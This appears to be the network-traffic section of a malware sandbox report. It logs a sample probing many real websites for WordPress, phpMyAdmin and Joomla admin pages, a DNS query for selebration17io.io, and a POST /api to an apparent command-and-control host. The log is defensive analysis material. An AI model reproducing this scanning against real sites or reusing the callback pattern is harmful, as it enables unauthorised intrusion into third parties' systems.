Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://network-abilities.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://cpsgroupe.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: houseguru.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: shinko-kensetsu.co.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/administrator/
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: archononline.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: imp.ovh.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: imp.ovh.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: joaz.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipCookie: sid=6d8cb5bc-d047-11ee-bf1a-b2ef032372edUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://att.com.ph/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipCookie: crumb=BXbwiDwlRJolZmI4YmU4YTEyYjY5NTViYzJhODljNTYxOTM1M2ExUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mlbx.matrix.jp/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: houseguru.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Source: unknown

DNS traffic detected: queries for: selebration17io.io

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: isotrimorphicnongrasse.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:04 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Ygs3qqFp/kqJ2ZWQpConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:04 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:05 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: GK3kK274/NyG7tHwxConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 20 Feb 2024 23:26:05 GMTServer: ApacheContent-Length: 94Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:05 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-Azure-Application-Gateway/v2Date: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/htmlContent-Length: 179Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/html; charset=utf-8Connection: closex-wix-request-id: 1708471565.208147471428315208Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqe0L1PnLg6FLWqrGNmqNwAa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRals3RSyxx0MYg4GGADVIZ9NswkVZ0a/Kpm8IhOVV/2MClh3tjO0FmbCcRdHpQIhsFCg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,3+SKj2WaFkDLVdR9vyo8lJ/76x7/stiZn8lkJEBHkQI=,/j+AjfLiOiE0Vc9NsP8sK4wRwdsym/8rjzUP5A/qGmXyEPhhqrz5x6CGm56MeUd2/64sEjeNjExOBUpktkI8WA==Vary: Accept-EncodingX-Content-Type-Options: nosniffTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/html; charset=utf-8Connection: closex-wix-request-id: 1708471565.2501478442704122157Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRalot867MtYSc3APbnkd7f9Dpb3SW7+008Ar5bJO2TG+4Wpt6ND/sSN7Q26K/LDtWcVA==,2UNV7KOq4oGjA5+PKsX47K0eODJntj8FkQmv0QgFYbsfbJaKSXYQ/lskq2jK6SGP,prnV6gMCdbwFzlCPEq+2AB4gj9IPM3/8Ir5L1DmRssE=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeServer: Apache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Length: 13695Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTServer: ApacheContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/"Server-Timing: wp-before-template;dur=327.35, wp-before-template-db-queries;dur=9.67
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: ApacheSet-Cookie: PHPSESSID=9igri8h3d2ih2b7lfdbago2oq9rdlupc; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Set-Cookie: PHPSESSID=a7c53cbda29ac3f1aa031a7966ea7724; path=/Transfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:09 GMTexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: PHPSESSID=nbo5dkpghnmk09b9mde7vjlk4k; expires=Fri, 10-Jun-2078 22:52:18 GMT; Max-Age=1713655569; path=/; secure; HttpOnly; SameSite=Noneaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUTaccess-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, tokencontent-type: text/html; charset=iso-8859-1x-backend: server2x-type: customerx-varnish: 961018282age: 0transfer-encoding: chunkedx-server: varnish-1connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:09 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://fortressrealcapital.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWhL9%2FIRI2EW6%2FG6Qiwayn9mrkgz9BLTTFVvXG92g1zORv5dZvlr4%2F0IENTKfT%2BzxB2KRwkVChd4fZ2TkzWB0T5Ib0VFFLMAuOCF5n1IbJO5EEjieAUlIaVFo5133a9p99q8s%2FdOdIrOSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 858a834e0cfdc34b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:05 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:10 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:10 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheContent-Length: 94Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:10 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: ApacheStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: same-originCache-Control: no-cache, privateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheSet-Cookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85s; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:11 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheSet-Cookie: PHPSESSID=2t4c8juom6focs8erkpfrjb6er2og151; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/"Server-Timing: wp-before-template;dur=311.48, wp-before-template-db-queries;dur=8.86
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://fortressrealcapital.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lf%2FJpKYBl0sHce8gCN7tqQOGtAgnNZCv7%2Bbi7ef9OiJRwfSWdbLKCuGVtr3v2xjH4vsE8Ay7wWeQlg%2Fol1s9fTJ%2FC7%2Fe%2F9dNm%2Br2A6KiSRCvcSo6ubH8xHO1SLbz8qcdxdGc74T8e03SHg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 858a8358dd1cc436-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://amsantechnology.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:12 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:12 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:13 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:13 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.1Date: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/htmlContent-Length: 159Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:13 GMTexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: PHPSESSID=mm2855pn5cueotnic4oa3bpkn6; expires=Fri, 10-Jun-2078 22:52:26 GMT; Max-Age=1713655573; path=/; secure; HttpOnly; SameSite=Noneaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUTaccess-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, tokencontent-type: text/html; charset=iso-8859-1x-backend: server2x-type: customerx-varnish: 960709554age: 0transfer-encoding: chunkedx-server: varnish-1connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
